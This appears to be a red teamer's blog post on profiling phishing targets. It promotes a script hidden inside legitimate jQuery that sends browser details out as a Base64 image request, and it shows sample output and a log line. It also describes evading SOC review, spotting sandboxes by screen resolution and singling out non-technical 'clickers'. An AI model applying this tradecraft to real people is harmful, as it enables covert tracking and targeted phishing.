Thoughts on user profiling

Boy oh boy has it been awhile. New job, new state, new house, new excuses 🙂

I wanted to make a post on the subject of user profiling as a way to document and work out my own thoughts on the subject. Sometimes things that sound great in your head look utterly stupid once you put them to “ink”. This is also a good time to talk about a script that I pushed to Github:

https://github.com/keyzerrezyek/JQueryingU

This script has some background info on the Github page, including info on the original author of the script. I took his work, added the Flash support, minimized, and packed the script, then put it inside legitimate jQuery. The profiling exfill method was modified to be inside a Base64 image GET request rather than a POST.

This post is looking to discuss the value of profiling users and if there are other benefits that have been overlooked.

Profiling activity through websites can be broken down into two catgegories:

  • Passive – no profiling script. Attacker is just looking at UserAgent in GET requests on attacker controlled domain
  • Active – profiling script and/or cookies are used. Attacker monitors POST or encoded GET request output from the profiling script

The obvious benefit to Passive is that there is no “script” for the victims SOC to find in the event that an email gets flagged as suspicious. The downside is that there are limitations to the info you can get from a UserAgent; information such as support for Flash and Java will not be present. The benefits to active are the exact inverse of passive. That being said, plenty of legitimate “profiling” scripts are being used by non-malicious websites to make sure proper content is being delivered. The rewards far outweigh the risks in my opinion. I might make an exception if the target is a known “hard target” or person of importance that will have email under a higher degree of scrutiny.

Focusing on the active side of things, what do we want to get out of profiling?

The obvious answer is, “the users plugins and versions so we can create a targeted exploit if applicable.” While that is still true, I believe that this is largely becoming less relevant as Flash phases out slowly. Corporations often times need to run Java, but sending an “exploit” to the endpoint is fairly risky when you don’t know what EDR products are on the workstation. Criminals have no problems doing this back in the day with exploit kits because it’s a number game and they aren’t trying to target one specific corporation like a Red Teamer is.

A more nuanced benefit is that you can get an idea which users are likely to click on links, and then follow up down the road with an actual payload for the specific users that are known “clickers”. No point in spraying your malicious link across an organizations inboxes if you don’t have to. APT’s are well known for performing recon before delivering payloads, but many Red Teams do not since they are on a tight timeframe. I have no scientific data to back it up, but the inclusion of screen resolution is my favorite piece of data returned. Why? Most sandboxes have very low resolutions, and I don’t believe I have ever seen more modern resolutions like 1920x. Additionally, if you get some crazy high resolution like 3840 I would stereotypically say that user might be a higher priority target like a developer or sys admin. I would also caution that those are the users more likely to report phishing or poke at your infrastructure. My ideal target is running IE and 1600 ish resolution. No technical users surf the web with IE if they have any other options, and not too many orgs don’t have Chrome/Chromium or Firefox alongside the corporate mandated IE for some crappy legacy app that absolutely must be supported. So anyone with IE and a lower resolution is often times our standard, non technical office grunt. That being said, sometimes if people are clicking on links inside Outlook it will open in IE as a default browser.

An additional benefit is that you can embed a profiling script on a web page which contains a payload and then send each targeted user a link to a unique URI. For example, send users a link to http://example.com/clickme.php?companyname=unique_id where each unique_id is correlated to a particular targeted user. The profiling script which I have put on github is designed to be used in this method. You would be amazed at how much traffic your site starts getting as soon as you start phishing. Being able to determine what the “leak” is and if requests outside your targeted user are general spidering behavior, or threat hunters performing targeted “poking” are useful to gauge the overall security posture of your target. On engagements before I have heard a Tier2 SOC analyst proudly say, “Did you see my request to your site, I used the Google Bot User Agent?” Of course a seasoned SOC will not typically touch any suspected attack infrastructure. But….. this is the real world and it happens.

The profiling script which is 90% the code created by Christian Ludwig and cited on my github is pretty standard. It give you the following info.

http://localhost:8000/index.php?id=sam|OS: Mac OS X 10.13|Browser: Firefox 60 (60.0)|Mobile: false|Flash: 29.0 r0|Java: false|Cookies: true|Screen Size: 1680 x 1050|Language: en-US|Full User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0

The original request inside your access log will look as follows:

Example Log output: [Mon Apr 16 11:51:17 2018] ::1:63582 [200]: /analytics.gif?uid=aHR0cDovL2xvY2FsaG9zdDo4MDAwL2luZGV4LnBocD9pZD1zYW18T1M6IE1hYyBPUyBYIDEwLjEzfEJyb3dzZXI6IEZpcmVmb3ggNjAgKDYwLjApfE1vYmlsZTogZmFsc2V8Rmxhc2g6IDI5LjAgcjB8SmF2YTogZmFsc2V8Q29va2llczogdHJ1ZXxTY3JlZW4gU2l6ZTogMTY4MCB4IDEwNTB8TGFuZ3VhZ2U6IGVuLVVTfEZ1bGwgVXNlciBBZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTM7IHJ2OjYwLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjAuMA==

Happy Profiling.

Leave a Reply